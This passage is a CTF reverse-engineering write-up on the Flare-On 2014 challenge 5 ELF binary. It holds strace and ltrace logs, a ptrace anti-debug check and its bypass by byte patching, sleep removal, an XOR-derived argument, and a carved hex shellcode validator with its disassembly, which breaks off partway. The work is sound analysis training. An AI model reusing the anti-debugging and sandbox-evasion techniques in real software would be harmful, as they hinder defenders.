9
INFO: floss.string_decoder: decoding strings
10
decoding strings: 100%|█████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 168.85 functions/s]
11
INFO: floss: finished execution after 10.94 seconds
12
INFO: floss: rendering results
13

14
FLARE FLOSS RESULTS (version v3.1.1-0-g3cd3ee6)
15

16
+------------------------+------------------------------------------------------------------------------------+
17
| file path              | e7bc5d2c0cf4480348f5504196561297                                                   |
18
| identified language    | unknown                                                                            |
19
| extracted strings      |                                                                                    |
20
|  static strings        | 6094 (53770 characters)                                                            |
21
|   language strings     |    0 (    0 characters)                                                            |
22
|  stack strings         | 0                                                                                  |
23
|  tight strings         | 0                                                                                  |
24
|  decoded strings       | 0                                                                                  |
25
+------------------------+------------------------------------------------------------------------------------+
26

27

28
 ─────────────────────────────
29
  FLOSS STATIC STRINGS (6094)
30
 ─────────────────────────────
31

32
+------------------------------------+
33
| FLOSS STATIC STRINGS: ASCII (6094) |
34
+------------------------------------+
35

36
H9\$(t
37
.
38
.
39
.
40
Logrhythm
41
Rails
42
userdel
43
install
44
which
45
more
46
Juniper
47
touch
48
wait
49
unexpand
50
7zip
51
0cool
52
apropos
53
IMAP
54
jobs
55
VeriSign
56
==:)
57
BIOS
58
Heartbleed
59
.
60
.
61
.
62
comm
63
rsync
64
tail
65
timeout
66
BBBBBBBBB@BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB>BBB?456789:;<=BBBABBB
67
BBBBBB
68
 !"#$%&'()*+,-./0123BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBFATAL: kernel too old
69
/dev/urandom
70
FATAL: cannot determine kernel version
71
/dev/full
72
/dev/null
73
cannot set %fs base address for thread-local storage
74
unexpected reloc type in static binary
75
cxa_atexit.c
76
l != ((void *)0)
77
__new_exitfn
78
LIBC_FATAL_STDERR_
79
/dev/tty
80
======= Backtrace: =========
81
======= Memory map: ========
82
/proc/self/maps
83
<heap nr="%d">
84
<sizes>
85
</heap>
86
malloc.c
87
((p)->size & 0x2)
88
(p->prev_size == offset)
89
<unknown>
90
malloc: top chunk is corrupt
91
corrupted double-linked list
92
TOP_PAD_
93
PERTURB_
94
MMAP_MAX_
95
ARENA_MAX
96
ARENA_TEST
97
TRIM_THRESHOLD_
98
MMAP_THRESHOLD_
99
free(): invalid pointer
100
invalid fastbin entry (free)
101
free(): invalid size
102
heap->ar_ptr == av
103
arena.c
104
p->size == (0|0x1)
105
locked
106
malloc(): memory corruption
107
(bck->bk->size & 0x4) == 0
108
(fwd->size & 0x4) == 0
109
bit != 0
110
correction >= 0
111
realloc(): invalid old size
112
realloc(): invalid next size
113
!((oldp)->size & 0x2)
114
ncopies >= 3
115
realloc(): invalid pointer
116
hooks.c
117
ms->av[2*i+3] == 0
118
nclears >= 3
119
Arena %d:
120
system bytes     = %10u
121
in use bytes     = %10u
122
Total (incl. mmap):
123
max mmap regions = %10u
124
max mmap bytes   = %10lu
125
<malloc version="1">
126
_int_memalign
127
_int_malloc
128
sYSMALLOc
129
munmap_chunk
130
_int_free
131
heap_trim
132
mremap_chunk
133
_int_realloc
134
__libc_malloc
135
__libc_realloc
136
__libc_valloc
137
__libc_pvalloc
138
__libc_calloc
139
.
140
.
141
.
142
<total type="fast" count="%zu" size="%zu"/>
143
<total type="rest" count="%zu" size="%zu"/>
144
<system type="current" size="%zu"/>
145
<system type="max" size="%zu"/>
146
<aspace type="total" size="%zu"/>
147
<aspace type="mprotect" size="%zu"/>
148
</malloc>
149
malloc_consolidate
150
__malloc_set_state
151
__libc_memalign
152
../sysdeps/x86_64/multiarch/../cacheinfo.c
153
! "cannot happen"
154
offset == 2
155
.
156
.
157
.
158
.
159
.
160
.
161
xdg-open
162
GCC: (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
163
.shstrtab
164
.note.ABI-tag
165
.note.gnu.build-id
166
.rela.plt
167
.init
168
.text
169
__libc_freeres_fn
170
__libc_thread_freeres_fn
171
.fini
172
.rodata
173
__libc_atexit
174
__libc_subfreeres
175
__libc_thread_subfreeres
176
.eh_frame
177
.gcc_except_table
178
.tdata
179
.tbss
180
.init_array
181
.fini_array
182
.ctors
183
.dtors
184
.jcr
185
.data.rel.ro
186
.got
187
.got.plt
188
.data
189
.bss
190
__libc_freeres_ptrs
191
.comment
192

193

194
+------------------------------------+
195
| FLOSS STATIC STRINGS: UTF-16LE (0) |
196
+------------------------------------+
197

198

199

200
 ─────────────────────────
201
  FLOSS STACK STRINGS (0)
202
 ─────────────────────────
203

204

205

206
 ─────────────────────────
207
  FLOSS TIGHT STRINGS (0)
208
 ─────────────────────────
209

210

211

212
 ───────────────────────────
213
  FLOSS DECODED STRINGS (0)
214
 ───────────────────────────

Now we we jump into some disassembly stuff

Basic Dynamic Analysis#

ltrace traces library function calls, like
- printf
- strcmp
- malloc
- fopen
- puts
- exit etc..

1
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ ltrace ./e7bc5d2c0cf4480348f5504196561297
2
Couldn't find .dynsym or .dynstr in "/proc/2152/exe"
3
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ no
4

5
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ ltrace ./e7bc5d2c0cf4480348f5504196561297 arg1
6
Couldn't find .dynsym or .dynstr in "/proc/2154/exe"
7
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ na
8

9
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ ltrace ./e7bc5d2c0cf4480348f5504196561297 arg1 agr2
10
Couldn't find .dynsym or .dynstr in "/proc/2156/exe"
11
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ bad
12

13
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ ltrace ./e7bc5d2c0cf4480348f5504196561297 arg1 agr2 arg3
14
Couldn't find .dynsym or .dynstr in "/proc/2160/exe"
15
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ stahp
16
ltrace ./e7bc5d2c0cf4480348f5504196561297 arg1 agr2 arg3 agr4
17
Couldn't find .dynsym or .dynstr in "/proc/2162/exe"
18
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ stahp

strace shows how a program talks to the Linux kernel.
The binary initializes normally, performs minimal environment setup, does not receive required arguments, immediately fails its internal validation logic, prints "no", and exits with a fixed failure code.
No user-controlled input is processed at all meaning the program expects specific arguments, and if they are not present or not correct, it terminates instantly.

1
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ strace ./e7bc5d2c0cf4480348f5504196561297
2
execve("./e7bc5d2c0cf4480348f5504196561297", ["./e7bc5d2c0cf4480348f55041965612"...], 0x7ffd6d797520 /* 49 vars */) = 0
3
uname({sysname="Linux", nodename="remnux", ...}) = 0
4
brk(NULL)                               = 0x3fde1000
5
brk(0x3fde21c0)                         = 0x3fde21c0
6
arch_prctl(ARCH_SET_FS, 0x3fde1880)     = 0
7
brk(0x3fe031c0)                         = 0x3fe031c0
8
brk(0x3fe04000)                         = 0x3fe04000
9
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0
10
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f74a9d75000
11
write(1, "no\n", 3no
12
)                     = 3
13
exit_group(52)                          = ?
14
+++ exited with 52 +++

1
# Running Strace with 2 arguments
2
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ strace ./e7bc5d2c0cf4480348f5504196561297 arg1 arg2
3
execve("./e7bc5d2c0cf4480348f5504196561297", ["./e7bc5d2c0cf4480348f55041965612"..., "arg1", "arg2"], 0x7ffdb7a46ad0 /* 49 vars */) = 0
4
uname({sysname="Linux", nodename="remnux", ...}) = 0
5
brk(NULL)                               = 0x7018000
6
brk(0x70191c0)                          = 0x70191c0
7
arch_prctl(ARCH_SET_FS, 0x7018880)      = 0
8
brk(0x703a1c0)                          = 0x703a1c0
9
brk(0x703b000)                          = 0x703b000
10
ptrace(PTRACE_TRACEME)                  = -1 EPERM (Operation not permitted)
11
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0
12
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb585c32000
13
write(1, "Program received signal SIGSEGV,"..., 52Program received signal SIGSEGV, Segmentation fault
14
) = 52
15
exit_group(9001)                        = ?
16
+++ exited with 41 +++

This is simplest anti-debugging technique in Linux, simply,
- https://reverseengineering.stackexchange.com/questions/1930/detecting-tracing-in-linux/1931#1931
Here is the linux syscall table, https://web.archive.org/web/20201218060355/http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/.

1
if (ptrac(PTRACE_TRACEME, 0, 1, 0) == -1) BeingDebugged = true;

Advance Static Analysis#

Here is the reference of sys_ptrace in sub_4742B0 function, so rename with mw_syscall_anti_debug_ptrace
The ptrace system call (sys_ptrace) in Linux is used by a tracer process to monitor and control a trace process, generally returning 0 on success or -1 on error.

Pasted image 20260201142232.png

this mw_anti_debug_ptrace is referenced in another function which is checking the return value and if it is -1 which means failed then it will crash and return Segmentation Fault so we have to patch that by replacing 74 (jz) conditional jump with EB (jmp) unconditional jump.
I used this as reference,
- https://c9x.me/x86/html/file_module_x86_id_147.html

Pasted image 20260201144857.png

1
    if ( (mw_anti_debug_ptrace(0, 0, 1u, 0) & 0x8000000000000000LL) != 0LL )
2
    {
3
      sub_45EBE0((__int64)"Program received signal SIGSEGV, Segmentation fault");
4
      sub_45E790(9001);
5
    }

Patch 1: ptrace patching#

So to patch that
I need to first get opcodes to identify the hex sequence so to do that i used ida’s patch feature and get the sequence of opcodes,

1
74 14 BF 50 3B 4F 00 E8 B8 F9 03 00 BF 29 23 00

Pasted image 20260201150209.png

I can use HxD, to change 74 to EB,

Pasted image 20260201150931.png

After that, i open it in ida and as you can see that it is taking unconditional jump with any condition so the patch worked perfectly.

Pasted image 20260201151221.png

Now this command no longer given seg fault,

1
┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
2
└─$ strace -i ./e7bc5d2c0cf4480348f5504196561297.patched arg1 arg2
3

4
[00007add30ede557] execve("./e7bc5d2c0cf4480348f5504196561297.patched", ["./e7bc5d2c0cf4480348f55041965612"..., "arg1", "arg2"], 0x7fff3abb55b8 /* 35 vars */) = 0
5
[00000000004a9297] uname({sysname="Linux", nodename="DESKTOP-VRSQRAJ", ...}) = 0
6
[00000000004aa78a] brk(NULL)            = 0x27391000
7
[00000000004aa78a] brk(0x273921c0)      = 0x273921c0
8
[000000000045e3f5] arch_prctl(ARCH_SET_FS, 0x27391880) = 0
9
[00000000004aa78a] brk(0x273b31c0)      = 0x273b31c0
10
[00000000004aa78a] brk(0x273b4000)      = 0x273b4000
11
[000000000047431b] ptrace(PTRACE_TRACEME) = -1 EPERM (Operation not permitted)
12
[0000000000473e44] fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0
13
[000000000047509a] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x778d0840d000
14
[0000000000473f50] write(1, "bad\n", 4bad
15
) = 4
16
[0000000000473dd8] exit_group(420)      = ?
17
[????????????????] +++ exited with 164 +++

Now lets analyze the sub_435E20 which has bad string so i renamed it as mw_bad_str and by doing some digging i can see that it is checking that argument length is 10 or not.

Pasted image 20260201152007.png

By analyzing further we understand that the string “bngcg`debd” is XOR’ed with 0x56 to obtain the value of the 1st argument.

Pasted image 20260201153736.png

By doing XOR i get this value 4815162342, which is exactly 10 digit long so i passed this as argument in patched program,

Pasted image 20260201152747.png

We can see a nanosleep at offset 0x473d50.

1
┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
2
└─$ strace -i ./e7bc5d2c0cf4480348f5504196561297.patched 4815162342 arg2
3

4
[00007f2fa72de557] execve("./e7bc5d2c0cf4480348f5504196561297.patched", ["./e7bc5d2c0cf4480348f55041965612"..., "4815162342", "arg2"], 0x7ffcc1afea98 /* 35 vars */) = 0
5
[00000000004a9297] uname({sysname="Linux", nodename="DESKTOP-VRSQRAJ", ...}) = 0
6
[00000000004aa78a] brk(NULL)            = 0x2c36a000
7
[00000000004aa78a] brk(0x2c36b1c0)      = 0x2c36b1c0
8
[000000000045e3f5] arch_prctl(ARCH_SET_FS, 0x2c36a880) = 0
9
[00000000004aa78a] brk(0x2c38c1c0)      = 0x2c38c1c0
10
[00000000004aa78a] brk(0x2c38d000)      = 0x2c38d000
11
[000000000047431b] ptrace(PTRACE_TRACEME) = -1 EPERM (Operation not permitted)
12
[000000000047c9c0] rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
13
[000000000047c882] rt_sigaction(SIGCHLD, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0
14
[000000000047c9c0] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
15
[0000000000473d50] nanosleep({tv_sec=3600, tv_nsec=0}, ^C{tv_sec=3581, tv_nsec=387430080}) = ? ERESTART_RESTARTBLOCK (Interrupted by signal)

nanosleep(3600 seconds); which is 1 hour,
it is used for
- Waste analyst time
- Beat sandbox timeouts
- Make sample look “hung”
At this 0x473d50 offset it it doing syscall to nanosleep, and the function is sub_473D40.
In IDA Pro, we confirm 0x63 (35) is moved to EAX and syscall is then called.
Still referring to the syscall table, we confirm it corresponds to nanosleep.
https://man7.org/linux/man-pages/man2/nanosleep.2.html

Pasted image 20260201153733.png

Patch 2: nanosleep patch#

We can see that nanosleep is called 2 times in the function.
Let’s patch the code by replacing syscall with NOP’s, as follows:
- So same as previously we grep the hex stream which is this,

1
B8 23 00 00 00 0F 05

Pasted image 20260201153735.png

Using HxD we will patch that,

Pasted image 20260201155658.png

After that i checked the diff both and here is what i got,

1
< e7bc5d2c0cf4480348f5504196561297.patched2:     file format elf64-x86-64
2
---
3
> e7bc5d2c0cf4480348f5504196561297.patched2.bak:     file format elf64-x86-64
4
122582,122588c122582,122583
5
<   473d49:     90                      nop
6
<   473d4a:     90                      nop
7
<   473d4b:     90                      nop
8
<   473d4c:     90                      nop
9
<   473d4d:     90                      nop
10
<   473d4e:     90                      nop
11
<   473d4f:     90                      nop
12
---
13
>   473d49:     b8 23 00 00 00          mov    eax,0x23
14
>   473d4e:     0f 05                   syscall
15
122595,122601c122590,122591
16
<   473d6a:     90                      nop
17
<   473d6b:     90                      nop
18
<   473d6c:     90                      nop
19
<   473d6d:     90                      nop
20
<   473d6e:     90                      nop
21
<   473d6f:     90                      nop
22
<   473d70:     90                      nop
23
---
24
>   473d6a:     b8 23 00 00 00          mov    eax,0x23
25
>   473d6f:     0f 05                   syscall

Now we know that this first argument but what about second argument,
So i dig little and found that some bytes are being encoded using base64.
I got into the habit of copying the base64 bytes and setting up breakpoints every once in a while to get back to a checkpoint after each crash.
sub_401164 function decodes the bytes from base64.

Pasted image 20260202001050.png

Pasted image 20260202001508.png

After some analysis i found that those bytes are shellcode,
This is the flow of shellcode function,

1
entry ->
2
sub_452079 ->
3
    sub_44D525 ->
4
        sub_44BE43 ->
5
            sub_44B942 (Decompile_problem) -> mw_base64_decode
6
                                           -> mw_shellcode_sus

Advance Dynamic Analysis#

I used edb tool for dynamic debugging for elf,
So i go to that 0x44bb2b location and i found that it is calling, as discussed previously,

1
00000000:0044bb2b ff d2    call rdx

So we can dump it by doing follow in dump of rdx and we get the shellcode,
I carve the shellcode and remove some unnecessary bytes,

Pasted image 20260201234708.png

I step into the function and see where shellcode ends and it is ending on this last operation, so up till this i kept and remove remaining bytes,

1
0x00007ffd6741cc8c: 80 38 D7 cmp byte ptr [eax], 0xd7

Stage 2 Shellcode Analysis#

Initial Triage#

File Type: shellcode.bin: data
Size: 607 bytes
SHA256: 85b70829d62ab78429754247036a540afdb3548608cef9bbde53bef1f6ccd8c5

Basic Static Analysis#

I checked VT for this hash, but it gives no results,
So i upload it and check whether it gives something, but nothing

Pasted image 20260201233759.png

Pasted image 20260201233920.png

Advance Static Analysis#

This is 2nd stage shellcode carved from 1st stage elf,

1
48 89 f8 e8 00 00 00 00 48 8b 1c 24 48 83 c3 0a eb 0a 48 31 d2 48 31 c0 b0 3c 0f 05 c0 08 f2 80 38 1b 74 02 ff e3 48 83 c0 01 80 30 40 80 30 f2 80 30 b3 80 38 30 74 02 ff e3 48 83 c0 01 80 30 71 80 38 1f 74 02 ff e3 48 83 c0 01 80 00 a3 c0 08 bc 80 38 b0 74 02 ff e3 48 83 c0 01 80 28 79 80 38 e8 74 02 ff e3 48 83 c0 01 c0 08 82 80 28 28 80 38 f6 74 02 ff e3 48 83 c0 01 80 28 b0 c0 08 4d 80 00 2c 80 38 1f 74 02 ff e3 48 83 c0 01 80 00 54 c0 00 99 80 30 b8 c0 08 2a 80 00 3f 80 38 af 74 02 ff e3 48 83 c0 01 c0 08 ba 80 38 5d 74 02 ff e3 48 83 c0 01 80 30 ed c0 08 6c 80 00 30 80 38 29 74 02 ff e3 48 83 c0 01 80 28 bf 80 38 b5 74 02 ff e3 48 83 c0 01 c0 00 bc 80 00 8c c0 00 7b 80 28 31 80 00 63 80 38 a5 74 02 ff e3 48 83 c0 01 c0 00 20 c0 00 16 80 30 ae c0 00 98 80 38 f3 74 02 ff e3 48 83 c0 01 c0 08 6e 80 00 d2 80 38 a6 74 02 ff e3 48 83 c0 01 80 00 34 80 38 62 74 02 ff e3 48 83 c0 01 80 00 cd 80 28 10 80 00 62 80 30 b2 80 38 32 74 02 ff e3 48 83 c0 01 80 30 b7 80 30 73 c0 08 07 80 38 eb 74 02 ff e3 48 83 c0 01 80 00 34 80 28 61 c0 08 36 80 00 5b 80 28 4c 80 38 0b 74 02 ff e3 48 83 c0 01 80 00 5a 80 38 9a 74 02 ff e3 48 83 c0 01 c0 08 a2 80 38 99 74 02 ff e3 48 83 c0 01 80 30 7e 80 28 e7 80 38 2b 74 02 ff e3 48 83 c0 01 80 28 b8 80 30 86 80 00 4e c0 08 4a c0 00 57 80 38 af 74 02 ff e3 48 83 c0 01 c0 08 86 80 30 e8 c0 00 95 80 30 4a 80 30 ad 80 38 c3 74 02 ff e3 48 83 c0 01 c0 08 45 80 30 cc 80 00 1c 80 38 03 74 02 ff e3 48 83 c0 01 80 28 4a 80 38 e3 74 02 ff e3 48 83 c0 01 80 30 a5 c0 08 90 80 38 ca 74 02 ff e3 48 83 c0 01 c0 08 de c0 00 36 80 30 78 80 28 d8 80 38 3e 74 02 ff e3 48 83 c0 01 80 00 b5 80 28 ad c0 08 89 c0 00 a2 c0 00 11 80 38 d8 74 02 ff e3 48 83 c0 01 80 00 40 80 28 21 c0 08 c0 80 38 82 74 02 ff e3 48 83 c0 01 c0 00 e3 80 38 7b 74 02 ff e3 48 83 c0 01 80 28 78 c0 08 f6 80 38 d7

And this is actual disassembled assembly,

1
0x0000000000000000:  48                dec     eax
2
0x0000000000000001:  89 F8             mov     eax, edi
3
0x0000000000000003:  E8 00 00 00 00    call    8
4
0x0000000000000008:  48                dec     eax
5
0x0000000000000009:  8B 1C 24          mov     ebx, dword ptr [esp]
6
0x000000000000000c:  48                dec     eax
7
0x000000000000000d:  83 C3 0A          add     ebx, 0xa
8
0x0000000000000010:  EB 0A             jmp     0x1c
9
0x0000000000000012:  48                dec     eax
10
0x0000000000000013:  31 D2             xor     edx, edx
11
0x0000000000000015:  48                dec     eax
12
0x0000000000000016:  31 C0             xor     eax, eax
13
0x0000000000000018:  B0 3C             mov     al, 0x3c
14
0x000000000000001a:  0F 05             syscall
15
0x000000000000001c:  C0 08 F2          ror     byte ptr [eax], 0xf2
16
0x000000000000001f:  80 38 1B          cmp     byte ptr [eax], 0x1b
17
0x0000000000000022:  74 02             je      0x26
18
0x0000000000000024:  FF E3             jmp     ebx
19
0x0000000000000026:  48                dec     eax
20
0x0000000000000027:  83 C0 01          add     eax, 1
21
0x000000000000002a:  80 30 40          xor     byte ptr [eax], 0x40
22
0x000000000000002d:  80 30 F2          xor     byte ptr [eax], 0xf2
23
0x0000000000000030:  80 30 B3          xor     byte ptr [eax], 0xb3
24
0x0000000000000033:  80 38 30          cmp     byte ptr [eax], 0x30
25
0x0000000000000036:  74 02             je      0x3a
26
0x0000000000000038:  FF E3             jmp     ebx
27
0x000000000000003a:  48                dec     eax
28
0x000000000000003b:  83 C0 01          add     eax, 1
29
0x000000000000003e:  80 30 71          xor     byte ptr [eax], 0x71
30
0x0000000000000041:  80 38 1F          cmp     byte ptr [eax], 0x1f
31
0x0000000000000044:  74 02             je      0x48
32
0x0000000000000046:  FF E3             jmp     ebx
33
0x0000000000000048:  48                dec     eax
34
0x0000000000000049:  83 C0 01          add     eax, 1
35
0x000000000000004c:  80 00 A3          add     byte ptr [eax], 0xa3
36
0x000000000000004f:  C0 08 BC          ror     byte ptr [eax], 0xbc
37
0x0000000000000052:  80 38 B0          cmp     byte ptr [eax], 0xb0
38
0x0000000000000055:  74 02             je      0x59
39
0x0000000000000057:  FF E3             jmp     ebx
40
0x0000000000000059:  48                dec     eax
41
0x000000000000005a:  83 C0 01          add     eax, 1
42
0x000000000000005d:  80 28 79          sub     byte ptr [eax], 0x79
43
0x0000000000000060:  80 38 E8          cmp     byte ptr [eax], 0xe8
44
0x0000000000000063:  74 02             je      0x67
45
0x0000000000000065:  FF E3             jmp     ebx
46
0x0000000000000067:  48                dec     eax
47
0x0000000000000068:  83 C0 01          add     eax, 1
48
0x000000000000006b:  C0 08 82          ror     byte ptr [eax], 0x82
49
0x000000000000006e:  80 28 28          sub     byte ptr [eax], 0x28
50
0x0000000000000071:  80 38 F6          cmp     byte ptr [eax], 0xf6
51
0x0000000000000074:  74 02             je      0x78
52
0x0000000000000076:  FF E3             jmp     ebx
53
0x0000000000000078:  48                dec     eax
54
0x0000000000000079:  83 C0 01          add     eax, 1
55
0x000000000000007c:  80 28 B0          sub     byte ptr [eax], 0xb0
56
0x000000000000007f:  C0 08 4D          ror     byte ptr [eax], 0x4d
57
0x0000000000000082:  80 00 2C          add     byte ptr [eax], 0x2c
58
0x0000000000000085:  80 38 1F          cmp     byte ptr [eax], 0x1f
59
0x0000000000000088:  74 02             je      0x8c
60
0x000000000000008a:  FF E3             jmp     ebx
61
0x000000000000008c:  48                dec     eax
62
0x000000000000008d:  83 C0 01          add     eax, 1
63
0x0000000000000090:  80 00 54          add     byte ptr [eax], 0x54
64
0x0000000000000093:  C0 00 99          rol     byte ptr [eax], 0x99
65
0x0000000000000096:  80 30 B8          xor     byte ptr [eax], 0xb8
66
0x0000000000000099:  C0 08 2A          ror     byte ptr [eax], 0x2a
67
0x000000000000009c:  80 00 3F          add     byte ptr [eax], 0x3f
68
0x000000000000009f:  80 38 AF          cmp     byte ptr [eax], 0xaf
69
0x00000000000000a2:  74 02             je      0xa6
70
0x00000000000000a4:  FF E3             jmp     ebx
71
0x00000000000000a6:  48                dec     eax
72
0x00000000000000a7:  83 C0 01          add     eax, 1
73
0x00000000000000aa:  C0 08 BA          ror     byte ptr [eax], 0xba
74
0x00000000000000ad:  80 38 5D          cmp     byte ptr [eax], 0x5d
75
0x00000000000000b0:  74 02             je      0xb4
76
0x00000000000000b2:  FF E3             jmp     ebx
77
0x00000000000000b4:  48                dec     eax
78
0x00000000000000b5:  83 C0 01          add     eax, 1
79
0x00000000000000b8:  80 30 ED          xor     byte ptr [eax], 0xed
80
0x00000000000000bb:  C0 08 6C          ror     byte ptr [eax], 0x6c
81
0x00000000000000be:  80 00 30          add     byte ptr [eax], 0x30
82
0x00000000000000c1:  80 38 29          cmp     byte ptr [eax], 0x29
83
0x00000000000000c4:  74 02             je      0xc8
84
0x00000000000000c6:  FF E3             jmp     ebx
85
0x00000000000000c8:  48                dec     eax
86
0x00000000000000c9:  83 C0 01          add     eax, 1
87
0x00000000000000cc:  80 28 BF          sub     byte ptr [eax], 0xbf
88
0x00000000000000cf:  80 38 B5          cmp     byte ptr [eax], 0xb5
89
0x00000000000000d2:  74 02             je      0xd6
90
0x00000000000000d4:  FF E3             jmp     ebx
91
0x00000000000000d6:  48                dec     eax
92
0x00000000000000d7:  83 C0 01          add     eax, 1
93
0x00000000000000da:  C0 00 BC          rol     byte ptr [eax], 0xbc
94
0x00000000000000dd:  80 00 8C          add     byte ptr [eax], 0x8c
95
0x00000000000000e0:  C0 00 7B          rol     byte ptr [eax], 0x7b
96
0x00000000000000e3:  80 28 31          sub     byte ptr [eax], 0x31
97
0x00000000000000e6:  80 00 63          add     byte ptr [eax], 0x63
98
0x00000000000000e9:  80 38 A5          cmp     byte ptr [eax], 0xa5
99
0x00000000000000ec:  74 02             je      0xf0
100
0x00000000000000ee:  FF E3             jmp     ebx
101
0x00000000000000f0:  48                dec     eax
102
0x00000000000000f1:  83 C0 01          add     eax, 1
103
0x00000000000000f4:  C0 00 20          rol     byte ptr [eax], 0x20
104
0x00000000000000f7:  C0 00 16          rol     byte ptr [eax], 0x16
105
0x00000000000000fa:  80 30 AE          xor     byte ptr [eax], 0xae
106
0x00000000000000fd:  C0 00 98          rol     byte ptr [eax], 0x98
107
0x0000000000000100:  80 38 F3          cmp     byte ptr [eax], 0xf3
108
0x0000000000000103:  74 02             je      0x107
109
0x0000000000000105:  FF E3             jmp     ebx
110
0x0000000000000107:  48                dec     eax
111
0x0000000000000108:  83 C0 01          add     eax, 1
112
0x000000000000010b:  C0 08 6E          ror     byte ptr [eax], 0x6e
113
0x000000000000010e:  80 00 D2          add     byte ptr [eax], 0xd2
114
0x0000000000000111:  80 38 A6          cmp     byte ptr [eax], 0xa6
115
0x0000000000000114:  74 02             je      0x118
116
0x0000000000000116:  FF E3             jmp     ebx
117
0x0000000000000118:  48                dec     eax
118
0x0000000000000119:  83 C0 01          add     eax, 1
119
0x000000000000011c:  80 00 34          add     byte ptr [eax], 0x34
120
0x000000000000011f:  80 38 62          cmp     byte ptr [eax], 0x62
121
0x0000000000000122:  74 02             je      0x126
122
0x0000000000000124:  FF E3             jmp     ebx
123
0x0000000000000126:  48                dec     eax
124
0x0000000000000127:  83 C0 01          add     eax, 1
125
0x000000000000012a:  80 00 CD          add     byte ptr [eax], 0xcd
126
0x000000000000012d:  80 28 10          sub     byte ptr [eax], 0x10
127
0x0000000000000130:  80 00 62          add     byte ptr [eax], 0x62
128
0x0000000000000133:  80 30 B2          xor     byte ptr [eax], 0xb2
129
0x0000000000000136:  80 38 32          cmp     byte ptr [eax], 0x32
130
0x0000000000000139:  74 02             je      0x13d
131
0x000000000000013b:  FF E3             jmp     ebx
132
0x000000000000013d:  48                dec     eax
133
0x000000000000013e:  83 C0 01          add     eax, 1
134
0x0000000000000141:  80 30 B7          xor     byte ptr [eax], 0xb7
135
0x0000000000000144:  80 30 73          xor     byte ptr [eax], 0x73
136
0x0000000000000147:  C0 08 07          ror     byte ptr [eax], 7
137
0x000000000000014a:  80 38 EB          cmp     byte ptr [eax], 0xeb
138
0x000000000000014d:  74 02             je      0x151
139
0x000000000000014f:  FF E3             jmp     ebx
140
0x0000000000000151:  48                dec     eax
141
0x0000000000000152:  83 C0 01          add     eax, 1
142
0x0000000000000155:  80 00 34          add     byte ptr [eax], 0x34
143
0x0000000000000158:  80 28 61          sub     byte ptr [eax], 0x61
144
0x000000000000015b:  C0 08 36          ror     byte ptr [eax], 0x36
145
0x000000000000015e:  80 00 5B          add     byte ptr [eax], 0x5b
146
0x0000000000000161:  80 28 4C          sub     byte ptr [eax], 0x4c
147
0x0000000000000164:  80 38 0B          cmp     byte ptr [eax], 0xb
148
0x0000000000000167:  74 02             je      0x16b
149
0x0000000000000169:  FF E3             jmp     ebx
150
0x000000000000016b:  48                dec     eax
151
0x000000000000016c:  83 C0 01          add     eax, 1
152
0x000000000000016f:  80 00 5A          add     byte ptr [eax], 0x5a
153
0x0000000000000172:  80 38 9A          cmp     byte ptr [eax], 0x9a
154
0x0000000000000175:  74 02             je      0x179
155
0x0000000000000177:  FF E3             jmp     ebx
156
0x0000000000000179:  48                dec     eax
157
0x000000000000017a:  83 C0 01          add     eax, 1
158
0x000000000000017d:  C0 08 A2          ror     byte ptr [eax], 0xa2
159
0x0000000000000180:  80 38 99          cmp     byte ptr [eax], 0x99
160
0x0000000000000183:  74 02             je      0x187
161
0x0000000000000185:  FF E3             jmp     ebx
162
0x0000000000000187:  48                dec     eax
163
0x0000000000000188:  83 C0 01          add     eax, 1
164
0x000000000000018b:  80 30 7E          xor     byte ptr [eax], 0x7e
165
0x000000000000018e:  80 28 E7          sub     byte ptr [eax], 0xe7
166
0x0000000000000191:  80 38 2B          cmp     byte ptr [eax], 0x2b
167
0x0000000000000194:  74 02             je      0x198
168
0x0000000000000196:  FF E3             jmp     ebx
169
0x0000000000000198:  48                dec     eax
170
0x0000000000000199:  83 C0 01          add     eax, 1
171
0x000000000000019c:  80 28 B8          sub     byte ptr [eax], 0xb8
172
0x000000000000019f:  80 30 86          xor     byte ptr [eax], 0x86
173
0x00000000000001a2:  80 00 4E          add     byte ptr [eax], 0x4e
174
0x00000000000001a5:  C0 08 4A          ror     byte ptr [eax], 0x4a
175
0x00000000000001a8:  C0 00 57          rol     byte ptr [eax], 0x57
176
0x00000000000001ab:  80 38 AF          cmp     byte ptr [eax], 0xaf
177
0x00000000000001ae:  74 02             je      0x1b2
178
0x00000000000001b0:  FF E3             jmp     ebx
179
0x00000000000001b2:  48                dec     eax
180
0x00000000000001b3:  83 C0 01          add     eax, 1
181
0x00000000000001b6:  C0 08 86          ror     byte ptr [eax], 0x86
182
